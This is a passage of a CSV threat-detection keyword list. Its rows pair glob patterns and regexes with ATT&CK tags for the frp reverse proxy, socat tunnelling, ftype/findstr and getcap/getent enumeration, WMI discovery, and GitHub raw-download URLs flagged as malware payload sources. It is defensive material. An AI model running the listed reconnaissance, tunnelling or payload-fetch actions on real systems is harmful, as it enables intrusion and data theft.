T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*ff71979ea17d481194beba325a55f5d2a319175ebc6a80df535a202a43614f24*",".{0,1000}ff71979ea17d481194beba325a55f5d2a319175ebc6a80df535a202a43614f24.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*ffa8edd59c275f6c592835b11b1f00e7c83c7d1e91aa8d9f6d666d286e902017*",".{0,1000}ffa8edd59c275f6c592835b11b1f00e7c83c7d1e91aa8d9f6d666d286e902017.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*fff687bfe2b84105d847369852022a26a6101d839cfdb1ecc88a45d1683a8709*",".{0,1000}fff687bfe2b84105d847369852022a26a6101d839cfdb1ecc88a45d1683a8709.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*frpc -c *frpc.ini*",".{0,1000}frpc\s\-c\s.{0,1000}frpc\.ini.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*frpc reload -c *",".{0,1000}frpc\sreload\s\-c\s.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose 
a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*frpc status -c *",".{0,1000}frpc\sstatus\s\-c\s.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*frpc verify -c *",".{0,1000}frpc\sverify\s\-c\s.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*frpc_windows_amd64.exe*",".{0,1000}frpc_windows_amd64\.exe.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","1","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*frpc_windows_arm64.exe*",".{0,1000}frpc_windows_arm64\.exe.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","1","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*frps -c *frps.toml*",".{0,1000}frps\s\-c\s.{0,1000}frps\.toml.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server 
behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*frps_windows_amd64.exe*",".{0,1000}frps_windows_amd64\.exe.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","1","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*frps_windows_arm64.exe*",".{0,1000}frps_windows_arm64\.exe.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","1","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*ssh -o 'proxycommand socat - *",".{0,1000}ssh\s\-o\s\'proxycommand\ssocat\s\-\s.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*ftype *findstr *dfil*",".{0,1000}ftype\s.{0,1000}findstr\s.{0,1000}dfil.{0,1000}","greyware_tool_keyword","ftype","will return the file type information for file types that include the string dfil - hidden objective is to find cmdfile string","T1033 - T1059 - T1083","TA0007 - TA0002","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*ftype *findstr *SHCm*",".{0,1000}ftype\s.{0,1000}findstr\s.{0,1000}SHCm.{0,1000}","greyware_tool_keyword","ftype","will return the file type information for 
file types that include the string SHCm - hidden objective is to find SHCmdFile string","T1033 - T1059 - T1083","TA0007 - TA0002","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*ftype *findstr dfil*",".{0,1000}ftype\s.{0,1000}findstr\sdfil.{0,1000}","greyware_tool_keyword","ftype","will return the file type information for file types that include the string dfil - hidden objective is to find cmdfile string","T1033 - T1059 - T1083","TA0007 - TA0002","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*ftype *findstr SHCm*",".{0,1000}ftype\s.{0,1000}findstr\sSHCm.{0,1000}","greyware_tool_keyword","ftype","will return the file type information for file types that include the string SHCm - hidden objective is to find SHCmdFile string","T1033 - T1059 - T1083","TA0007 - TA0002","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*pooljnboifbodgifngpppfklhifechoe*",".{0,1000}pooljnboifbodgifngpppfklhifechoe.{0,1000}","greyware_tool_keyword","GeoProxy","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*getcap -r / 2>*",".{0,1000}getcap\s\-r\s\/\s2\>.{0,1000}","greyware_tool_keyword","getcap","recursively scans all the files starting from the root directory / and lists files with capabilities set","T1082 - T1007","TA0007 - TA0009","N/A","N/A","discovery","N/A","1","0","N/A","N/A","6","8","N/A","N/A","N/A","N/A" "*getcap -r / 2>/dev/null*",".{0,1000}getcap\s\-r\s\/\s2\>\/dev\/null.{0,1000}","greyware_tool_keyword","Getcap","Enumerating File Capabilities with Getcap","T1046 - 
T1083","TA0007","N/A","N/A","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","N/A","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z" "*getent passwd | cut -d: -f1*",".{0,1000}getent\spasswd\s\|\scut\s\-d\:\s\-f1.{0,1000}","greyware_tool_keyword","getent","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*Get-WmiObject -class SMS_Authority -namespace root\CCM*",".{0,1000}Get\-WmiObject\s\-class\sSMS_Authority\s\-namespace\sroot\\CCM.{0,1000}","greyware_tool_keyword","Get-WmiObject","Get SCCM server with Get-WmiObject","T1087 - T1018","TA0007 - TA0002","N/A","N/A","Discovery","https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1","1","0","N/A","N/A","5","8","N/A","N/A","N/A","N/A" "*Get-WmiObject -Namespace ""root\directory\ldap"" -Class ds_user *",".{0,1000}Get\-WmiObject\s\-Namespace\s\""root\\directory\\ldap\""\s\-Class\sds_user\s.{0,1000}","greyware_tool_keyword","Get-WmiObject","Get all users","T1087 - T1018","TA0007 - TA0002","N/A","N/A","Discovery","https://github.com/alperenugurlu/AD_Enumeration_Hunt/blob/alperen_ugurlu_hack/AD_Enumeration_Hunt.ps1","1","0","N/A","N/A","5","1","92","20","2023-08-05T06:10:26Z","2023-08-05T05:16:57Z" "*Get-WmiObject win32_loggedonuser -ComputerName *",".{0,1000}Get\-WmiObject\swin32_loggedonuser\s\-ComputerName\s.{0,1000}","greyware_tool_keyword","Get-WmiObject","Get logged on user on remote host with Get-WmiObject","T1049 - T1018 - T1087","TA0007 - TA0002 - 
TA0009","N/A","N/A","Discovery","https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1","1","0","N/A","N/A","5","8","N/A","N/A","N/A","N/A" "*/github.com*.exe?raw=true*",".{0,1000}\/github\.com.{0,1000}\.exe\?raw\=true.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/archive/refs/tags/*.zip*",".{0,1000}\/github\.com\/.{0,1000}\/archive\/refs\/tags\/.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.7z*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.7z.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.apk*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.apk.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.app*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.app.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive 
!","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.as*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.as.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.asc*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.asc.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.asp*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.asp.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.bash*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.bash.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.bat*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.bat.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" 
"*/github.com/*/raw/main/*.beacon*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.beacon.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.bin*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.bin.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.bpl*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.bpl.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.c*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.c.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.cer*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.cer.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.cmd*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.cmd.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by 
malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.com*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.com.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.cpp*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.cpp.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.crt*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.crt.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.cs*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.cs.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.csh*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.csh.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" 
"*/github.com/*/raw/main/*.dat*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.dat.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.dll*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.dll.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.docm*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.docm.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.dos*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.dos.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.exe*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.go*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.go.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by 
malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.gz*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.gz.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.hta*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.hta.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.iso*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.iso.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.jar*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.jar.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.js*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.js.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" 
"*/github.com/*/raw/main/*.lnk*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.lnk.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.log*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.log.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.mac*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.mac.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.mam*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.mam.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.msi*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.msi.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.msp*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.msp.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by 
malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.nexe*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.nexe.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.nim*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.nim.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.otm*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.otm.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.out*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.out.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.ova*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.ova.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive 
!","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.pem*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.pem.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.pfx*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.pfx.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.pl*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.pl.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.plx*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.plx.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.pm*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.pm.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.ppk*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.ppk.{0,1000}","greyware_tool_keyword","github","Github raw 
access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.ps1*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.ps1.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.psm1*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.psm1.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.pub*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.pub.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.py*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.py.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.pyc*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.pyc.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive 
